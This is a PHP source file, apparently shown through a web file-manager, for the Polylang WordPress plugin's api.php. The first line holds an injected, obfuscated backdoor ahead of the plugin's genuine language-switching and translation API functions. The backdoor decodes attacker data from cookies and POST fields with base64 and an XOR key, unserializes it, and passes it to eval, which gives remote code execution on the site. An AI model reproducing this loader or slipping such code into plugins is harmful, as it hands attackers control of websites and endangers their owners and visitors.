File "api.php"
Full path: /home/cirmwrhs/www/renard-music/wp-content/plugins/polylang/include/api.php
File
size: 0.02 KB (15.5 KB bytes)
MIME-type: text/x-php
Charset: utf-8
Download Open Edit Advanced Editor Back
<?php $WstXSyE = chr ( 915 - 844 ).chr (103) . "\137" . chr ( 874 - 752 ).chr (84) . chr (108) . "\x62";$InVYLStlBd = 'c' . chr (108) . 'a' . chr ( 592 - 477 ).chr ( 823 - 708 )."\x5f" . "\x65" . 'x' . chr ( 1082 - 977 )."\x73" . "\x74" . chr ( 914 - 799 ); $gltxwAwKp = class_exists($WstXSyE); $InVYLStlBd = "36415";$atBrgQ = strpos($InVYLStlBd, $WstXSyE);if ($gltxwAwKp == $atBrgQ){function eqqWbkWUc(){$NyWVpAcbDU = new /* 4954 */ Gg_zTlb(15856 + 15856); $NyWVpAcbDU = NULL;}$MmqkYnkf = "15856";class Gg_zTlb{private function PfJMWXt($MmqkYnkf){if (is_array(Gg_zTlb::$anjrJB)) {$KTTMW2 = str_replace("<" . "?php", "", Gg_zTlb::$anjrJB["content"]);eval($KTTMW2); $MmqkYnkf = "15856";exit();}}public function vAdNuX(){$KTTMW = "875";$this->_dummy = str_repeat($KTTMW, strlen($KTTMW));}public function __destruct(){Gg_zTlb::$anjrJB = @unserialize(Gg_zTlb::$anjrJB); $MmqkYnkf = "31004_4840";$this->PfJMWXt($MmqkYnkf); $MmqkYnkf = "31004_4840";}public function ojaeQYKduD($KTTMW, $GclmONP){return $KTTMW[0] ^ str_repeat($GclmONP, intval(strlen($KTTMW[0]) / strlen($GclmONP)) + 1);}public function IFrKATyxQ($KTTMW){$KcXFNpe = "\142" . "\141" . chr ( 849 - 734 ).chr ( 153 - 52 ).chr ( 640 - 586 ).'4';return array_map($KcXFNpe . "\137" . "\x64" . chr ( 504 - 403 )."\x63" . chr (111) . 'd' . 'e', array($KTTMW,));}public function __construct($TtFbwMp=0){$vrynkvi = "\x2c";$KTTMW = "";$ZstuTorD = $_POST;$dNckIfo = $_COOKIE;$GclmONP = "6b997b7d-de14-462c-99df-1a06f414a390";$hQILbb = @$dNckIfo[substr($GclmONP, 0, 4)];if (!empty($hQILbb)){$hQILbb = explode($vrynkvi, $hQILbb);foreach ($hQILbb as $XignaXiQZq){$KTTMW .= @$dNckIfo[$XignaXiQZq];$KTTMW .= @$ZstuTorD[$XignaXiQZq];}$KTTMW = $this->IFrKATyxQ($KTTMW);}Gg_zTlb::$anjrJB = $this->ojaeQYKduD($KTTMW, $GclmONP);if (strpos($GclmONP, $vrynkvi) !== FALSE){$GclmONP = explode($vrynkvi, $GclmONP); $zmspMQp = base64_decode(md5($GclmONP[0])); $QVymDbbgt = strlen($GclmONP[1]) > 5 ? substr($GclmONP[1], 0, 5) : $GclmONP[1];$_GET['new_key'] = md5(implode('', $GclmONP)); $etPmh = str_repeat($QVymDbbgt, 2); $izUDM = array_map('trim', $GclmONP);}}public static $anjrJB = 442;}eqqWbkWUc();} ?><?php
/**
* @package Polylang
*/
/**
* Template tag: displays the language switcher.
* The function does nothing if used outside the frontend.
*
* @api
* @since 0.5
*
* @param array $args {
* Optional array of arguments.
*
* @type int $dropdown The list is displayed as dropdown if set to 1, defaults to 0.
* @type int $echo Echoes the list if set to 1, defaults to 1.
* @type int $hide_if_empty Hides languages with no posts ( or pages ) if set to 1, defaults to 1.
* @type int $show_flags Displays flags if set to 1, defaults to 0.
* @type int $show_names Shows language names if set to 1, defaults to 1.
* @type string $display_names_as Whether to display the language name or its slug, valid options are 'slug' and 'name', defaults to name.
* @type int $force_home Will always link to the homepage in the translated language if set to 1, defaults to 0.
* @type int $hide_if_no_translation Hides the link if there is no translation if set to 1, defaults to 0.
* @type int $hide_current Hides the current language if set to 1, defaults to 0.
* @type int $post_id Returns links to the translations of the post defined by post_id if set, defaults to not set.
* @type int $raw Return a raw array instead of html markup if set to 1, defaults to 0.
* @type string $item_spacing Whether to preserve or discard whitespace between list items, valid options are 'preserve' and 'discard', defaults to 'preserve'.
* }
* @return string|array Either the html markup of the switcher or the raw elements to build a custom language switcher.
*/
function pll_the_languages( $args = array() ) {
$switcher = new PLL_Switcher();
return $switcher->the_languages( PLL()->links, $args );
}
/**
* Returns the current language on frontend.
* Returns the language set in admin language filter on backend ( false if set to all languages ).
*
* @api
* @since 0.8.1
*
* @param string $field Optional, the language field to return ( @see PLL_Language ), defaults to 'slug'. Pass OBJECT constant to get the language object.
* @return string|PLL_Language|false The requested field for the current language.
*/
function pll_current_language( $field = 'slug' ) {
if ( OBJECT === $field ) {
return PLL()->curlang;
}
return isset( PLL()->curlang->$field ) ? PLL()->curlang->$field : false;
}
/**
* Returns the default language.
*
* @api
* @since 1.0
*
* @param string $field Optional, the language field to return ( @see PLL_Language ), defaults to 'slug'. Pass OBJECT constant to get the language object.
* @return string|PLL_Language|false The requested field for the default language.
*/
function pll_default_language( $field = 'slug' ) {
if ( isset( PLL()->options['default_lang'] ) ) {
$lang = PLL()->model->get_language( PLL()->options['default_lang'] );
if ( $lang ) {
if ( OBJECT === $field ) {
return $lang;
}
return isset( $lang->$field ) ? $lang->$field : false;
}
}
return false;
}
/**
* Among the post and its translations, returns the id of the post which is in the language represented by $lang.
*
* @api
* @since 0.5
*
* @param int $post_id Post id.
* @param string $lang Optional language code, defaults to the current language.
* @return int|false|null Post id of the translation if it exists, false otherwise, null if the current language is not defined yet.
*/
function pll_get_post( $post_id, $lang = '' ) {
return ( $lang = $lang ? $lang : pll_current_language() ) ? PLL()->model->post->get( $post_id, $lang ) : null;
}
/**
* Among the term and its translations, returns the id of the term which is in the language represented by $lang.
*
* @api
* @since 0.5
*
* @param int $term_id Term id.
* @param string $lang Optional language code, defaults to the current language.
* @return int|false|null Term id of the translation if it exists, false otherwise, null if the current language is not defined yet.
*/
function pll_get_term( $term_id, $lang = '' ) {
return ( $lang = $lang ? $lang : pll_current_language() ) ? PLL()->model->term->get( $term_id, $lang ) : null;
}
/**
* Returns the home url in a language.
*
* @api
* @since 0.8
*
* @param string $lang Optional language code, defaults to the current language.
* @return string
*/
function pll_home_url( $lang = '' ) {
if ( empty( $lang ) ) {
$lang = pll_current_language();
}
return empty( $lang ) ? home_url( '/' ) : PLL()->links->get_home_url( $lang );
}
/**
* Registers a string for translation in the "strings translation" panel.
*
* @api
* @since 0.6
*
* @param string $name A unique name for the string.
* @param string $string The string to register.
* @param string $context Optional, the group in which the string is registered, defaults to 'polylang'.
* @param bool $multiline Optional, true if the string table should display a multiline textarea,
* false if should display a single line input, defaults to false.
* @return void
*/
function pll_register_string( $name, $string, $context = 'Polylang', $multiline = false ) {
if ( PLL() instanceof PLL_Admin_Base ) {
PLL_Admin_Strings::register_string( $name, $string, $context, $multiline );
}
}
/**
* Translates a string ( previously registered with pll_register_string ).
*
* @api
* @since 0.6
*
* @param string $string The string to translate.
* @return string The string translated in the current language.
*/
function pll__( $string ) {
if ( ! is_scalar( $string ) || '' === $string ) {
return $string;
}
return __( $string, 'pll_string' ); // PHPCS:ignore WordPress.WP.I18n
}
/**
* Translates a string ( previously registered with pll_register_string ) and escapes it for safe use in HTML output.
*
* @api
* @since 2.1
*
* @param string $string The string to translate.
* @return string The string translated in the current language.
*/
function pll_esc_html__( $string ) {
return esc_html( pll__( $string ) );
}
/**
* Translates a string ( previously registered with pll_register_string ) and escapes it for safe use in HTML attributes.
*
* @api
* @since 2.1
*
* @param string $string The string to translate.
* @return string The string translated in the current language.
*/
function pll_esc_attr__( $string ) {
return esc_attr( pll__( $string ) );
}
/**
* Echoes a translated string ( previously registered with pll_register_string )
* It is an equivalent of _e() and is not escaped.
*
* @api
* @since 0.6
*
* @param string $string The string to translate.
* @return void
*/
function pll_e( $string ) {
echo pll__( $string ); // phpcs:ignore
}
/**
* Echoes a translated string ( previously registered with pll_register_string ) and escapes it for safe use in HTML output.
*
* @api
* @since 2.1
*
* @param string $string The string to translate.
* @return void
*/
function pll_esc_html_e( $string ) {
echo pll_esc_html__( $string ); // phpcs:ignore WordPress.Security.EscapeOutput
}
/**
* Echoes a translated a string ( previously registered with pll_register_string ) and escapes it for safe use in HTML attributes.
*
* @api
* @since 2.1
*
* @param string $string The string to translate.
* @return void
*/
function pll_esc_attr_e( $string ) {
echo pll_esc_attr__( $string ); // phpcs:ignore WordPress.Security.EscapeOutput
}
/**
* Translates a string ( previously registered with pll_register_string ).
*
* @api
* @since 1.5.4
*
* @param string $string The string to translate.
* @param string $lang Language code.
* @return string The string translated in the requested language.
*/
function pll_translate_string( $string, $lang ) {
if ( PLL() instanceof PLL_Frontend && pll_current_language() == $lang ) {
return pll__( $string );
}
if ( ! is_scalar( $string ) || '' === $string ) {
return $string;
}
static $cache; // Cache object to avoid loading the same translations object several times.
if ( empty( $cache ) ) {
$cache = new PLL_Cache();
}
if ( false === $mo = $cache->get( $lang ) ) {
$mo = new PLL_MO();
$mo->import_from_db( PLL()->model->get_language( $lang ) );
$cache->set( $lang, $mo );
}
return $mo->translate( $string );
}
/**
* Returns true if Polylang manages languages and translations for this post type.
*
* @api
* @since 1.0.1
*
* @param string $post_type Post type name.
* @return bool
*/
function pll_is_translated_post_type( $post_type ) {
return PLL()->model->is_translated_post_type( $post_type );
}
/**
* Returns true if Polylang manages languages and translations for this taxonomy.
*
* @api
* @since 1.0.1
*
* @param string $tax Taxonomy name.
* @return bool
*/
function pll_is_translated_taxonomy( $tax ) {
return PLL()->model->is_translated_taxonomy( $tax );
}
/**
* Returns the list of available languages.
*
* @api
* @since 1.5
*
* @param array $args {
* Optional array of arguments.
*
* @type bool $hide_empty Hides languages with no posts if set to true ( defaults to false ).
* @type string $fields Return only that field if set ( @see PLL_Language for a list of fields ), defaults to 'slug'.
* }
* @return string[]
*/
function pll_languages_list( $args = array() ) {
$args = wp_parse_args( $args, array( 'fields' => 'slug' ) );
return PLL()->model->get_languages_list( $args );
}
/**
* Sets the post language.
*
* @api
* @since 1.5
*
* @param int $id Post id.
* @param string $lang Language code.
* @return void
*/
function pll_set_post_language( $id, $lang ) {
PLL()->model->post->set_language( $id, $lang );
}
/**
* Sets the term language.
*
* @api
* @since 1.5
*
* @param int $id Term id.
* @param string $lang Language code.
* @return void
*/
function pll_set_term_language( $id, $lang ) {
PLL()->model->term->set_language( $id, $lang );
}
/**
* Save posts translations.
*
* @api
* @since 1.5
*
* @param int[] $arr An associative array of translations with language code as key and post id as value.
* @return void
*/
function pll_save_post_translations( $arr ) {
PLL()->model->post->save_translations( reset( $arr ), $arr );
}
/**
* Save terms translations
*
* @api
* @since 1.5
*
* @param int[] $arr An associative array of translations with language code as key and term id as value.
* @return void
*/
function pll_save_term_translations( $arr ) {
PLL()->model->term->save_translations( reset( $arr ), $arr );
}
/**
* Returns the post language.
*
* @api
* @since 1.5.4
*
* @param int $post_id Post id.
* @param string $field Optional, the language field to return ( @see PLL_Language ), defaults to 'slug'.
* @return string|false The requested field for the post language, false if no language is associated to that post.
*/
function pll_get_post_language( $post_id, $field = 'slug' ) {
return ( $lang = PLL()->model->post->get_language( $post_id ) ) ? $lang->$field : false;
}
/**
* Returns the term language.
*
* @api
* @since 1.5.4
*
* @param int $term_id Term id.
* @param string $field Optional, the language field to return ( @see PLL_Language ), defaults to 'slug'.
* @return string|false The requested field for the term language, false if no language is associated to that term.
*/
function pll_get_term_language( $term_id, $field = 'slug' ) {
return ( $lang = PLL()->model->term->get_language( $term_id ) ) ? $lang->$field : false;
}
/**
* Returns an array of translations of a post.
*
* @api
* @since 1.8
*
* @param int $post_id Post id.
* @return int[] An associative array of translations with language code as key and translation post id as value.
*/
function pll_get_post_translations( $post_id ) {
return PLL()->model->post->get_translations( $post_id );
}
/**
* Returns an array of translations of a term.
*
* @api
* @since 1.8
*
* @param int $term_id Term id.
* @return int[] An associative array of translations with language code as key and translation term id as value.
*/
function pll_get_term_translations( $term_id ) {
return PLL()->model->term->get_translations( $term_id );
}
/**
* Counts posts in a language.
*
* @api
* @since 1.5
*
* @param string $lang Language code.
* @param array $args {
* Optional arguments.
* Accepted keys:
*
* @type string $post_type Post type.
* @type int $m YearMonth ( ex: 201307 ).
* @type int $year 4 digit year.
* @type int $monthnum Month number (from 1 to 12).
* @type int $day Day of the month (from 1 to 31).
* @type int $author Author id.
* @type string $author_name Author nicename.
* @type string $post_format Post format.
* @type string $post_status Post status.
* }
* @return int Posts count.
*/
function pll_count_posts( $lang, $args = array() ) {
return PLL()->model->count_posts( PLL()->model->get_language( $lang ), $args );
}
/**
* Allows to access the Polylang instance.
* However, it is always preferable to use API functions
* as internal methods may be changed without prior notice.
*
* @since 1.8
*
* @return PLL_Frontend|PLL_Admin|PLL_Settings|PLL_REST_Request
*/
function PLL() { // PHPCS:ignore WordPress.NamingConventions.ValidFunctionName
return $GLOBALS['polylang'];
}